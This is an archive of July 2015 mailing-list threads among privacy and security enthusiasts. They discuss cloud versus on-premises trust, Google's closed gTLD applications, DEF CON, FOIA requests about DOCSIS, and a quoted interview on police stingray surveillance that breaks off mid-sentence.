-- otr fp: https://www.ctrlc.hu/~stef/otr.txt From drwho at virtadpt.net Tue Jul 14 11:28:30 2015 From: drwho at virtadpt.net (The Doctor) Date: Tue, 14 Jul 2015 11:28:30 -0700 Subject: an ominous comment In-Reply-To: <20150714155203.826F52282E2@palinka.tinho.net> References: <20150714155203.826F52282E2@palinka.tinho.net> Message-ID: <55A554CE.6090009@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/14/2015 08:52 AM, dan at geer.org wrote: > Discussing security policy post-OPM debacle in a setting to which I > have access (sorry to be oblique), it was said by a CxO "We have to > prepare for the day when no software we depend on is run on > premises." On the other hand, what about the day when you can't trust any software you don't run on machines down the hall because any or all providers can be legally forced to sell you out and never tell you? At least if you have your own data center, you know when you've pissed someone off enough to come after you because they have to knock on your front door. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "It's filled with seven cannon balls, and it doesn't talk." 
From drwho at virtadpt.net Tue Jul 14 11:29:35 2015 From: drwho at virtadpt.net (The Doctor) Date: Tue, 14 Jul 2015 11:29:35 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> Message-ID: <55A5550F.4030008@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/14/2015 10:09 AM, Kurt Buff wrote: > Because, as mothers everywhere ask "if some of your friends jumped > off a cliff, would that make it the right and smart thing to do, or > merely the popular and stupid thing?" On the third tentacle, what if they know something you don't, and are busily saving their own skins? - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "It's filled with seven cannon balls, and it doesn't talk."
From dan at geer.org Tue Jul 14 08:52:03 2015 From: dan at geer.org (dan at geer.org) Date: Tue, 14 Jul 2015 11:52:03 -0400 Subject: an ominous comment Message-ID: <20150714155203.826F52282E2@palinka.tinho.net> Discussing security policy post-OPM debacle in a setting to which I have access (sorry to be oblique), it was said by a CxO "We have to prepare for the day when no software we depend on is run on premises." I did not handle this well (think sputtering as an alternative to white rage). At the same time, I am probably in a bubble in that I suspect that nearly everyone I see with a computer (of any form factor) is already in that situation or, save for Javascript piped in from the cloud to run locally, soon will be -- denizens of this list and a few others excepted. Echoing Lenin echoing Chernyshevsky, "What is to be done?" or, perhaps, "Is anything to be done?"
--dan From kurt.buff at gmail.com Tue Jul 14 12:26:52 2015 From: kurt.buff at gmail.com (Kurt Buff) Date: Tue, 14 Jul 2015 12:26:52 -0700 Subject: an ominous comment In-Reply-To: <55A5550F.4030008@virtadpt.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A5550F.4030008@virtadpt.net> Message-ID: On Tue, Jul 14, 2015 at 11:29 AM, The Doctor wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > On 07/14/2015 10:09 AM, Kurt Buff wrote: > >> Because, as mothers everywhere ask "if some of your friends jumped >> off a cliff, would that make it the right and smart thing to do, or >> merely the popular and stupid thing?" > > On the third tentacle, what if they know something you don't, and are > busily saving their own skins? In which case, they should be able to justify, to me, why they're jumping - I'm reasonably intelligent, and can usually follow along... Kurt From list at sysfu.com Tue Jul 14 12:49:10 2015 From: list at sysfu.com (Seth) Date: Tue, 14 Jul 2015 12:49:10 -0700 Subject: an ominous comment In-Reply-To: <38064966-50b6-456b-bd42-f957e8d999d9@email.android.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <5A737270-3637-40A2-847C-ADC88A6C9681@openmailbox.org> <38064966-50b6-456b-bd42-f957e8d999d9@email.android.com> Message-ID: On Tue, 14 Jul 2015 12:28:54 -0700, Anthony Michaels wrote: > The more time goes by, the more I agree with Ed Snowden and his > statement about the Internet dividing into two groups: those who are > part of the technical elite and have the ability to protect themselves > and those who don't and must accept that their privacy will be raped at > will. Agreed, however if dedicated people who care about freedom/privacy/liberty can build hardware and software products that are by default distributed, encrypted, and safe to use __by non-technical people__, then it's game over for the centralized control freak bloodsucking vampire fiat currency bankster predasites. 
(predator/parasites) From tbiehn at gmail.com Tue Jul 14 10:26:11 2015 From: tbiehn at gmail.com (Travis Biehn) Date: Tue, 14 Jul 2015 13:26:11 -0400 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> Message-ID: On Tue, Jul 14, 2015 at 1:20 PM, Kurt Buff wrote: > On Tue, Jul 14, 2015 at 10:02 AM, Stephen D. Williams wrote: > > Everything will be run in the cloud and browser because it is, overall, a > > better computation model. > > Certainly that's the current bias, but web browser as platform isn't > really all that it's cracked up to be, IMHO - all browsers suck, and I > don't see them getting better any time soon, especially if they run > javascript and plugins. > > > However, that doesn't preclude you from running a > > cloud locally. > > Certainly better than public/commercial clouds - at least until proven > encryption becomes the norm. > > > Although pretty much proprietary to Google & Amazon until > > recently, Docker et al and related VM/container management APIs that are > > mappable to all kinds of implementations will allow apps, administration, > > networking, etc. to be fluid between commercial and various types of > private > > clouds. > > > > In a lot of ways, this is an elegant solution and could arguably be much > > more secure than desktop apps in Windows. Assuming your container system > > isn't running in Windows, which is becoming an option; one that I won't > > trust easily. > > Eh - good sysadmins with good managers/policies can secure Windows > just fine, though I do like jails under FreeBSD... > > Kurt > There's data, metadata and computation. Homomorphic encryption is one part of the solution which fits in with least priv / least authority software engineering. Running your own infrastructure provides a false sense of security, anyway, benefits over cloud are likely an illusion. 
-Travis -- Twitter | LinkedIn | GitHub | TravisBiehn.com | Google Plus From jya at pipeline.com Tue Jul 14 10:35:25 2015 From: jya at pipeline.com (John Young) Date: Tue, 14 Jul 2015 13:35:25 -0400 Subject: an ominous comment In-Reply-To: <55A540A7.6080808@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> Message-ID: Cloud and browser together constitute the most invasive programs since religion was invented and rewarded to absolve overreaching and abusive authority. Both cloud and browser are deliberately designed to mislead users about their threats to privacy and security. Iterations, adjustments, corrections of errors, automatic upgrades, official endorsements, repeatedly easy hacks, futile hearings of maladies long known and ignored, concentration of computer power, reduction of alternatives, foretell disaster as if natural, expected, bearable, and better than DIY, desktop, solo solutions, mavericks, and worst of all, openness. Cloud and browser are like imperial dogma, what's good for the empire operators is good for the people. Although cloud and browser to succeed must have access to all the people's private data to assure they remain peaceable. Sysadmins are the Cromwells, the Hacking Teams, the Kasperskys, violating law with impunity. At 01:02 PM 7/14/2015, you wrote: >Everything will be run in the cloud and browser because it is, >overall, a better computation model. However, that doesn't preclude >you from running a cloud locally. Although pretty much proprietary >to Google & Amazon until recently, Docker et al and related >VM/container management APIs that are mappable to all kinds of >implementations will allow apps, administration, networking, etc. to >be fluid between commercial and various types of private clouds.
> >In a lot of ways, this is an elegant solution and could arguably be >much more secure than desktop apps in Windows. Assuming your >container system isn't running in Windows, which is becoming an >option; one that I won't trust easily. > >sdw > >On 7/14/15 8:52 AM, dan at geer.org wrote: >> >>Discussing security policy post-OPM debacle in a setting to which >>I have access (sorry to be oblique), it was said by a CxO "We have >>to prepare for the day when no software we depend on is run on >>premises." >> >>I did not handle this well (think sputtering as an alternative to >>white rage). At the same time, I am probably in a bubble in that >>I suspect that nearly everyone I see with a computer (of any form >>factor) is already in that situation or, save for Javascript piped >>in from the cloud to run locally, soon will be -- denizens of this >>list and a few others excepted. >> >>Echoing Lenin echoing Chernyshevsky, "What is to be done?" or, >>perhaps, "Is anything to be done?" >> >>--dan > From cypher at cpunk.us Tue Jul 14 12:28:54 2015 From: cypher at cpunk.us (Anthony Michaels) Date: Tue, 14 Jul 2015 14:28:54 -0500 Subject: an ominous comment In-Reply-To: <5A737270-3637-40A2-847C-ADC88A6C9681@openmailbox.org> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <5A737270-3637-40A2-847C-ADC88A6C9681@openmailbox.org> Message-ID: <38064966-50b6-456b-bd42-f957e8d999d9@email.android.com> On July 14, 2015 2:14:03 PM CDT, oshwm wrote: >I would say the key question is 'who cares about your data the most?'. > >Do you want someone who's only concern is ticking enough boxes in order >to get paid and not sued or someone who passionately cares about the >data? > >You are the only person who values the security of your data. It's not just about who cares more about your data.
Most people don't have a solid enough understanding of security to protect their item data. Just because it's on your computer doesn't mean it's any safer from being grabbed than it is on the public cloud. Sure, you could take the time to learn good security but most people won't. That's just a utopian dream. The more time goes by, the more I agree with Ed Snowden and his statement about the Internet dividing into two groups: those who are part of the technical elite and have the ability to protect themselves and those who don't and must accept that their privacy will be raped at will. From grarpamp at gmail.com Tue Jul 14 13:44:15 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 14 Jul 2015 16:44:15 -0400 Subject: [Cryptography] Super-computer project wanted In-Reply-To: <55A53867.4090100@sonic.net> References: <55A53867.4090100@sonic.net> Message-ID: >>> dave at horsfall.org >>> So, is there anything that could benefit from a few parallel teraflops here and there? On Tue, Jul 14, 2015 at 12:27 PM, Ray Dillinger wrote: > Or you could apply static code analysis software to huge > masses of existing operating system, device driver, plugin, > email-client or god-help-us browser code in wide use and > see if you can't spot instances of dangerous vulnerabilities > like buffer overflows. A list of known errors would be > very helpful in getting code up to 'bulletproof' reliability > and no one runs ALL the possible static analysis we know > about on large bodies of code because it takes too long on > regular computers. This, and fuzzing... of all the opensource OS's and all the ported packages they supply. And dump all of github in it for fun. It takes too long, too much developer time, a different skillset, opensource test suites may not yet cover some areas that commercial ones do, etc. Ripe for development of an open perpetual audit project. That, and printing your own open and trusted chips, in your own open and trusted fab, are possible now.
It's big picture, grand slam, full circle headiness, but it is doable. People just have to get together and kick it off. From juan.g71 at gmail.com Tue Jul 14 14:34:03 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 14 Jul 2015 18:34:03 -0300 Subject: an ominous comment In-Reply-To: <55A540A7.6080808@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> Message-ID: <55a58019.e8658c0a.34ac.791f@mx.google.com> On Tue, 14 Jul 2015 10:02:31 -0700 "Stephen D. Williams" wrote: > Everything will be run in the cloud and browser because it is, > overall, a better computation model. This fine mailing list just keeps getting 'better'... From oshwm at openmailbox.org Tue Jul 14 12:14:03 2015 From: oshwm at openmailbox.org (oshwm) Date: Tue, 14 Jul 2015 20:14:03 +0100 Subject: an ominous comment In-Reply-To: <55A540A7.6080808@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> Message-ID: <5A737270-3637-40A2-847C-ADC88A6C9681@openmailbox.org> I would say the key question is 'who cares about your data the most?'. Do you want someone who's only concern is ticking enough boxes in order to get paid and not sued or someone who passionately cares about the data? You are the only person who values the security of your data. cheers, oshwm. From peter at m-o-o-t.org Tue Jul 14 12:50:11 2015 From: peter at m-o-o-t.org (Peter Fairbrother) Date: Tue, 14 Jul 2015 20:50:11 +0100 Subject: an ominous comment In-Reply-To: <55A540A7.6080808@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> Message-ID: <55A567F3.1000006@m-o-o-t.org> On 14/07/15 18:02, Stephen D. Williams wrote: > Everything will be run in the cloud and browser because it is, overall, > a better computation model. It is? Why? 
-- Peter Fairbrother From griffin at cryptolab.net Tue Jul 14 19:30:51 2015 From: griffin at cryptolab.net (Griffin Boyce) Date: Tue, 14 Jul 2015 22:30:51 -0400 Subject: Executive Director Needed, Tor Project In-Reply-To: References: <55A19D8A.6050300@riseup.net> <55a1c2a6.51958c0a.0522.ffff8e16@mx.google.com> <90b7e493c2083965919e8fb549c3b016@cryptolab.net> <55A4071B.6040304@virtadpt.net> Message-ID: Zenaan Harkness wrote: > On 7/13/15, Griffin Boyce wrote: >> The Doctor wrote: >>> Griffin Boyce wrote: >>> >>>> Whoa whoa whoa. We all know that Vermin Supreme is the community >>>> favorite to become the next Tor E.D. Juan's got no chance. >>> >>> You mean that Adam Weishaupt dropped out of the running? Shame, >>> that. >> >> ^ ▲ illuminati confirmed > > Don't know how many times ... illumiNETti. Sheesh.

       /\
      /  \
     /,--.\
    /< () >\
   /  `--'  \
  /   dank   \
 /   memes?   \
/______________\

From list at sysfu.com Wed Jul 15 00:21:40 2015 From: list at sysfu.com (Seth) Date: Wed, 15 Jul 2015 00:21:40 -0700 Subject: Why do people still use Google services? (was Re: Encryption Rights - A Google+ community) In-Reply-To: <20150714094523.637C2C00027@frontend1.nyi.internal> References: <20150714090319.GG6906@ctrlc.hu> <20150714094523.637C2C00027@frontend1.nyi.internal> Message-ID: On Tue, 14 Jul 2015 02:45:39 -0700, Shelley wrote: > I'm glad it's not just me! That was my reaction too but I held back > from commenting, because I feel like I'm always bitching here about > cpunks or anyone interested in privacy still using google for any > reason. I don't understand it. I've come to the conclusion that almost without exception, people will opt for convenience over privacy and dignity. Oh, in other news, Google has snapped up several of the new 'public' gTLDs (such as .dev) for their own exclusive use, yay Google.
[1] http://sealedabstract.com/rants/google-our-patron-saint-of-the-closed-web/ == Google, Our Patron Saint of the Closed Web ========================================== Lately there’s been a barrage of articles about how Apple is destroying the open web (because “app store, lol”) and it is Time Something Was Done About This: Apple’s paranoid approach to developer relations, and, I assume, relations with other browser vendors (and, in fact, relations to anything outside itself) is becoming a serious liability to the open Web. That is the issue we must confront. Or here: Apple simply does not play well with other vendors when it comes to standardization. The same sort of things we once criticized Microsoft for doing long ago, we give Apple a pass on today. They’re very content to play in their own little sandbox all too often. The answer of course is to petition the Internet Darling Google: In order to forcibly educate Apple to become a responsible web citizen, it is necessary to create a counter-weight; to find a company that will support the open Web and has enough market share to force even web developers who’d prefer to work in iOS only to pay attention to pointer events. That company is Google. Why? Who knows. Maybe because Android is “open”, whatever the hell that means. Maybe it is because Google is strongly pro-net-neutrality, and Apple has made their customary “no comment”. Maybe because Google employees have blogs. The world may never know. Meanwhile, in another part of town, Google has secretly been plotting to destroy the open internet. It started innocently enough Some time around 2008, ICANN determined we didn’t have enough domains. So they decided to open the floodgates on so-called “generic TLDs” or “gTLDs”. Stuff like .app, .ceo, .church, and so on. Of course ICANN cannot actually afford to manage the day-to-day operations of thousands of new TLDs. So they’ve opened the process up to anyone who wants to apply. 
So you fill out an application, you pay $185,000, there’s a convoluted evaluation process where they ask you questions like whether or not you’re a drug dealer and whether you’re technically qualified to run a TLD, and after a lengthy and bureaucratic review process you basically get your own TLD. It came as no surprise that thousands of applicants came forward in some kind of crazed internet landrush. Many internet companies are placing bets. Amazon made some 76 applications, and Google made even more, with 101. What people did not seem to expect (whether due to incompetence or malice is up for debate) is what they would be used for. Closed TLDs Let’s talk about a domain that’s near and dear to my heart, .dev. Wouldn’t it be great to have a domain for content targeted at software developers? So that you could actually get a domain name for www.[your-side-project].dev? Instead of abusing the .io domain which is officially for the British Indian Ocean Territory. Alas, Google does not think much of that plan. Under their shell company “Charleston Road Registry Inc.” (whose “CEO” is merely Google’s in-house counsel), they have applied for control of the .dev domain, which they intend to be: completely closed for the sole use of Google. In case you thought that was a typo, they elaborate: Second-level domain names within the proposed gTLD are intended for registration and use by Google only, and domain names under the new gTLD will not be available to the general public for purchase, sale, or registration. As such, Charleston Road Registry intends to apply for an exemption to the ICANN Registry Operator Code of Conduct as Google is intended to be the sole registrar and registrant.
In case you believe Google is drunk and they meant to apply for some other, more Google-specific string, instead of claiming some kind of monopoly over software development in its entirety, they helpfully clarify that no, they know exactly what they are doing: The proposed gTLD will provide Google with direct association to the term "dev," which is an abbreviation of the word, "development." The mission of this gTLD, .dev, is to provide a dedicated domain space in which Google can enact second-level domains specific to its projects in development. Specifically, the new gTLD will provide Google with greater ability to create a custom portal for employees to manage products and services in development. I will not bore you with the full application, which is 48 pages and includes such ridiculous details as how Google will respond to abuse claims from itself, and how it will handle disputes from itself if Google files a complaint with Google about Google’s registration of a domain name. Nor will I bother you with the other 100 applications for the other 100 TLDs, which are probably similar but I haven’t read all of them because it’s a Friday night and I have plans, so don’t shoot me if it turns out some of them are more evil than others. But it’s all in there, if you are looking for background material for your next Kafka novel. Update: Somebody did the math. Google wants 27 of them. The backlash begins I know what you’re thinking. “What backlash? I’ve never heard about this.” It turns out that Google’s behavior has annoyed a lot of domain name people. But you haven’t heard about it because you don’t hang out with scummy fly-by-night domainers who run SEO seminars. Nonetheless, there is plenty of buzz about this in those circles. (I can’t believe I just gave them a link.) Governments have also gotten upset too, although you wouldn’t know cause you don’t read boring government reports.
The Government of Australia, in particular, has been instrumental in trying to block these proposals. in late 2012 the Australian Government issued 129 early warnings to applicants of strings which raised a number of concerns, including where the applicant was seeking to have exclusive use of a generic term. ICANN’s Governmental Advisory Committee (GAC) subsequently provided advice to the ICANN Board at its Beijing meeting in April 2013, which included a recommendation relating to generic terms, and a non-exhaustive list of generic terms for the Board’s immediate consideration. In response to this controversy, ICANN decided to take a breather and think about if this whole “closed” domain thing was a good idea after all. Google doubles down In response to this criticism, Google backed off on what was clearly an overreach designed to wrest control over the future of the Internet. Haha, just kidding. Instead, Google CIO Ben Fried wrote what I’m pretty sure is the most brazen, jaw-dropping attack on an open Internet that has ever been publicly published by the executive of any Internet company. I mean, flip some words around and it sounds like you’re reading Comcast’s position against Net Neutrality. You should read the entire letter, but here are some highlights. Google opens with a “how-is-this-not-a-parody” argument that owning a TLD and not allowing anyone else to use it “lead[s] to diversified consumer choice”: Today, most Internet users have only one practical choice when it comes to how their TLDs are managed: a completely unrestricted model environment in which any registrant can register any name for any purpose and use it as they see fit. It’s sort of like how North Korea promotes choice because what if some people want to choose a totalitarian regime. 
They then argue that DNS configuration is too hard and so we should just force all .blog domains to use Google Blogger: By contrast, our application for the .blog TLD describes a new way of automatically linking new second level domains to blogs on our Blogger platform – this approach eliminates the need for any technical configuration on the part of the user and thus makes the domain name more user friendly That Google should be allowed to close TLDs because nobody will notice anyway: Because of the strong user bias toward domains within .com, today a generic .com domain name (e.g., jewelry.com or book.com) is likely to produce more traffic and to be more valuable for a business than a generic TLD. That Google has spent a lot of time and money trying to buy these domains and if you don’t let them bad things will happen Applicants have read the guidebook and relied on the policies contained within to guide their applications. They spent considerable time and money on their applications in the hopes they would be granted the applied for string. At best, retroactively deciding to allow a more restrictive interpretation of the guidebook and at worst going back and “adding in” policy runs the risk of appearing capricious and eroding trust in the process. Do you know what the consequences of not giving Google what they want will be? Do you? DO YOU? DO YOU ICANN?? we must remember that changing the process midstream will have real and practical consequences for businesses and end users alike. “Closed generic TLD”. Who even knows what those words mean anyway? I mean, you’d have to get a dictionary, or maybe (gasp) google it. Words don’t real: In reality, neither of the two words have a contextually appropriate objective definition, and the combined term has no meaning other than what has been invented in recent discussions about the gTLD program. Tell you what though. You know those 101 domains we applied for? We’ll throw you a bone and open 4 of them. 
That should resolve the “particular sensitivity within the Internet community” about Google closing the Internet. Google has identified four of our current single registrant applications that we will revise: .app, .blog, .cloud and .search. In conclusion Is my conclusion that Apple should get a free pass for hamstringing their web evangelists? No. Get your Safari team a blog, Apple. Let them give a talk at a fucking conference. My point is that if you think Google is some kind of Patron Saint of the Open Web, shit son. Tim Cook on his best day could not conceive of a dastardly plan like this. This is a methodical, coordinated, long-running and well-planned attack on the open web that comes from the highest levels of Google leadership. And we’re giving Apple a free pass? Pshaw. Let’s get serious. These companies are both as good or as bad as we allow them to be. There is no hero here. In the immortal words of John Adams, There is nothing which I dread so much as a division of the republic into two great parties, each arranged under its leader, and concerting measures in opposition to each other. This, in my humble apprehension, is to be dreaded as the greatest political evil under our Constitution. From zen at freedbms.net Tue Jul 14 18:48:25 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Wed, 15 Jul 2015 01:48:25 +0000 Subject: Executive Director Needed, Tor Project In-Reply-To: References: <55A19D8A.6050300@riseup.net> <55a1c2a6.51958c0a.0522.ffff8e16@mx.google.com> <90b7e493c2083965919e8fb549c3b016@cryptolab.net> <55A4071B.6040304@virtadpt.net> Message-ID: On 7/13/15, Griffin Boyce wrote: > The Doctor wrote: >> Griffin Boyce wrote: >> >>> Whoa whoa whoa. We all know that Vermin Supreme is the community >>> favorite to become the next Tor E.D. Juan's got no chance. >> >> You mean that Adam Weishaupt dropped out of the running? Shame, that. > > ^ ▲ illuminati confirmed Don't know how many times ... illumiNETti. Sheesh. 
From coderman at gmail.com Wed Jul 15 02:02:04 2015 From: coderman at gmail.com (coderman) Date: Wed, 15 Jul 2015 02:02:04 -0700 Subject: Defcon In-Reply-To: <1907895337.1640588.1436822430844.JavaMail.yahoo@mail.yahoo.com> References: <1907895337.1640588.1436822430844.JavaMail.yahoo@mail.yahoo.com> Message-ID: On 7/13/15, jim bell wrote: > Someone just reminded me that I have never attended Defcon Jim, this is a feature - not a bug! this year an entire conference track to: WALL OF SHEEP that's right. infosec failed so hard, that now the myriad and many ways in which privacy and security is an utter fuckshitmess, now displayed and exploited across hourly slots in Vegas slimebowl... just don't. every year farther from DEF CON. it's done kids. let it die in dignity! From coderman at gmail.com Wed Jul 15 02:10:13 2015 From: coderman at gmail.com (coderman) Date: Wed, 15 Jul 2015 02:10:13 -0700 Subject: [cryptome] Re: FOIPA adventures In-Reply-To: References: <000701d0bcb7$94118e80$bc34ab80$@co.uk> Message-ID: two new for DOCSIS tech @FBI, @CIA: "Any and all "DOCSIS" technology records, including cross-references and indirect mentions, including records outside the investigation main file. This is to include a search of each of the following record stores and interfaces: the Central Records System (CRS), the Automated Case Support system ("ACS") Investigative Case Management system ("ICM"), the Automated Case Support system ("ACS") Electronic Case File ("ECF"), and the Automated Case Support system ("ACS") Universal Index ("UNI"). I also request a search of "ELSUR", the database containing electronic surveillance information, for any and all records or activities related to "DOCSIS" or "DOCSIS intercept" or "DOCSIS access" technology. In addition, please extend the search criteria across any external storage media, including I-Drives, S-Drives, or related technologies used during the course of investigation involving Cable internet data services. 
DITU experimental technologies or research also within scope of this request. Please include processing notes, even if request is denied in part. Please identify individuals responsible for any aspect of FOIA processing in the processing notes, along with explanation of their involvement if not typically assigned FOIA responsibilities for the record systems above." - https://www.muckrock.com/foi/united-states-of-america-10/indocsis-19725/ "Any and all records, receipts, training, technology transfer programs, research, evaluation technologies, or other materials relevant to "DOCIS" cable communication technology. This is to include "DOCSIS 1.0", "DOCSIS 2.0", "DOCSIS 3.0", and other relevant DOCSIS protocols." - https://www.muckrock.com/foi/united-states-of-america-10/indocsisxfer-19726/ On 7/12/15, coderman wrote: > On 7/12/15, Douglas Rankine wrote: >> Are they giving reasons for the rejections? > > Glomar all around. see also: > > "What Is the Big Secret Surrounding Stingray Surveillance?" > - > http://www.scientificamerican.com/article/what-is-the-big-secret-surrounding-stingray-surveillance/ > > --- > > What Is the Big Secret Surrounding Stingray Surveillance? > > State and local law enforcement agencies across the U.S. are setting > up fake cell towers to gather mobile data, but few will admit it > By Larry Greenemeier | June 25, 2015 > > > Stung: Law enforcement agencies sometimes use a device called a > stingray to simulate a cell phone tower, enabling them to gather > international mobile subscriber identity (IMSI), location and other > data from mobile phones connecting to them. Pictured here is an actual > cell tower in Palatine, Ill. > > > Given the amount of mobile phone traffic that cell phone towers > transmit, it is no wonder law enforcement agencies target these > devices as a rich source of data to aid their investigations. Standard > procedure involves getting a court order to obtain phone records from > a wireless carrier. 
When authorities cannot or do not want to go that > route, they can set up a simulated cell phone tower—often called a > stingray—that surreptitiously gathers information from the suspects in > question as well as any other mobile device in the area. > > These simulated cell sites—which collect international mobile > subscriber identity (IMSI), location and other data from mobile phones > connecting to them—have become a source of controversy for a number of > reasons. National and local law enforcement agencies closely guard > details about the technology’s use, with much of what is known about > stingrays revealed through court documents and other paperwork made > public via Freedom of Information Act (FOIA) requests. > > One such document recently revealed that the Baltimore Police > Department has used a cell site simulator 4,300 times since 2007 and > signed a nondisclosure agreement with the FBI that instructed > prosecutors to drop cases rather than reveal the department’s use of > the stingray. Other records indicate law enforcement agencies have > used the technology hundreds of times without a search warrant, > instead relying on a much more generic court order known as a pen > register and trap and trace order. Last year Harris Corp., the > Melbourne, Fla., company that makes the majority of cell site > simulators, went so far as to petition the Federal Communications > Commission to block a FOIA request for user manuals for some of the > company’s products. > > The secretive nature of stingray use has begun to backfire on law > enforcement, however, with states beginning to pass laws that require > police to obtain a warrant before they can set up a fake cell phone > tower for surveillance. Virginia, Minnesota, Utah and Washington State > now have laws regulating stingray use, with California and Texas > considering similar measures. 
Proposed federal legislation to prevent > the government from tracking people’s cell phone or GPS location > without a warrant could also include stingray technology. > > Scientific American recently spoke with Brian Owsley, an assistant > professor of law at the University of North Texas Dallas College of > Law, about the legal issues and privacy implications surrounding the > use of a stingray to indiscriminately collect mobile phone data. Given > the invasive nature of the technology and scarcity of laws governing > its use, Owsley, a former U.S. magistrate judge in Texas, says the > lack of reliable information documenting the technology’s use is > particularly troubling. > > > [An edited transcript of the interview follows.] > > When and why did law enforcement agencies begin using international > cell site simulators to intercept mobile phone traffic and track > movement of mobile phone users? > > Initially, intelligence agencies—CIA and the like—couldn’t get local > or national telecommunications companies in other countries to > cooperate with U.S. surveillance operations against nationals in those > countries. To fill that void companies like the Harris Corp. started > creating cell site simulators for these agencies to use. Once Harris > saturated the intelligence and military markets [with] their products, > they turned to federal agencies operating in the U.S. So the [Drug > Enforcement Administration], Homeland Security, FBI and others started > having their own simulated cell sites to use for surveillance. > Eventually this trickled down further to yet another untapped market: > state and local law enforcement. That’s where we are today in terms of > the proliferation of this technology. > > > Under what circumstances do U.S. law enforcement agencies use cell > site simulators and related technology? 
> > There are three examples of how law enforcement typically use > stingrays for surveillance: First, law enforcement officials may use > the cell site simulator with the known cell phone number of a targeted > individual in order to determine that individual's location. For > example, officials are searching for a fugitive and have a cell phone > number that they believe the individual is using. They may operate a > stingray near areas where they believe that the individual may be, > such as a relative's home. > > Second, law enforcement officials may use the stingray to target a > specific individual who is using a cell phone, but these officials do > not know the cell phone number. They follow the targeted individual > from a site to various other locations over a certain time period. At > each new location, they activate the stingray and capture the cell > phone data for all of the nearby cell phones. After they have captured > the data at a number of sites they can analyze the data to determine > the cell phone or cell phones used by the targeted individual. This > approach captures the data of all nearby cell phones, including > countless cell phones of individuals unrelated to the criminal > investigation. > > Third, law enforcement officials have been known to operate stingray > at political rallies and protests. Using the stingray at these types > of events captures the cell phone data of everyone in attendance. > > > How does law enforcement get permission to perform this type of > surveillance? > > Federal law enforcement agencies typically get courts to approve use > of something like stingray through a pen register application [a pen > register is a device that records the numbers called from a particular > phone line]. With that type of application, essentially the government > says, we want this information. We think it’s going to be relevant to > an ongoing criminal investigation. 
As you can imagine, that’s a pretty > low bar for them to satisfy in the eyes of the court. Just about > anything could fit into that description. You don’t even have to show > that such an investigation would lead to an arrest or prosecution. Law > enforcement is telling the court, look, we’re in the middle of this > investigation. If we get this information, we think it might lead to > some other important information. > > Different court orders have different standards for approval. The > highest standard would be for a wiretap. A search warrant likewise has > a much higher standard than a pen register, requiring law enforcement > to prove probable cause before a judge will grant permission to use > additional means of investigation. The problem that I have with a pen > register to justify use of something like a stingray is that the > standard for a pen register is much too low, given the invasive nature > of a pen register. Instead, I think the use of a stingray should be > consistent with the Fourth Amendment of the Constitution and pursuant > to a search warrant. > > > Why not explicitly state the type of technology being used and its > specific purpose when filing for a court order? > > [When] law enforcement agencies seek to obtain judicial authorization > through a pen register, they do not directly indicate that they are > applying for authorization to use a stingray. Doing so might cause > some courts to question whether the pen register statute [as opposed > to some higher standard] is the appropriate basis for authorizing a > stingray. In addition, law enforcement agencies typically have to sign > nondisclosure agreements with Harris Corp. in order to receive the > federal Homeland Security funding needed to purchase the technology. 
> So there’s this concern, at least at the local law enforcement level, > about revealing any information about it because that would violate > the agreement with Harris and maybe subject them to losing the > equipment or some other consequences. > > > Why would law enforcement agencies sign a nondisclosure agreement with > a technology company? > > I’m not sure whether the agreements are being driven by the FBI or by > Harris, but these agreements seem to be getting less relevant insofar > as [there is less] need to keep the public unaware of the existence of > this technology. In the last three or so years there’s been a lot more > awareness about the technology and its use. When agencies were first > signing these agreements years ago, use of this technology wasn’t > widely known. Now you are getting situations where criminal defense > attorneys learn about stingray and similar technologies and the role > they may be playing in the arrests of some of their clients. Defense > teams are starting to ask questions and require the government to > produce documentation such as court orders, and that’s creating the > confrontation you’re now seeing. > > > Why have law enforcement agencies kept their use of cell site > simulators so secretive? > > Some of it is the cloudy legal issues surrounding the legitimate uses > of this technology. Law enforcement agencies will also argue that the > more information that’s available about this technology, the harder it > is for them to use these devices to fight crime. Yet there’s a growing > knowledge of this technology, and a serious criminal enterprise is > already aware of it. People are already using prepaid disposable > phones [sometimes referred to as “burner phones”] to some extent to > defeat this technology. Sophisticated criminals are aware that there’s > electronic surveillance out there in myriad ways, and so they’re going > to take precautions. From a technology perspective, it’s sort of a > cat-and-mouse game. 
There’s also a device that locates cell site > simulators, something referred to as an IMSI catcher. There’s an arms > race back and forth to get the best technology and to get the edge. > > > What does it say to you about the whole process that a prosecutor or a > law enforcement agency is willing to sacrifice a conviction in order > to keep their methods a secret? > > I think it’s a very odd approach. You are throwing away some > convictions or potential convictions for the sake of secrecy. But it’s > even harder to understand now that knowledge of the technology is > becoming so common. There have been documented cases in Baltimore and > Saint Louis where stingray has supposedly been used. The use of > stingray and related technologies is a roll of the dice in the sense > that law enforcement is hoping that either the defense attorneys don’t > have enough savvy or wherewithal to find out about the technology and > ask the right questions or, even if that does happen, they’re hoping > that the judge that they have is favorable to their approach and not > going to order them to reveal information about its use. In the rare > occasions when things go against them, they just dismiss it. > > > You yourself denied a law enforcement application three years ago to > use a stingray. Under what circumstances would you approve its use? > > I want to make clear: I don’t have a problem with stingray itself—I > understand that this can be a valuable tool in law 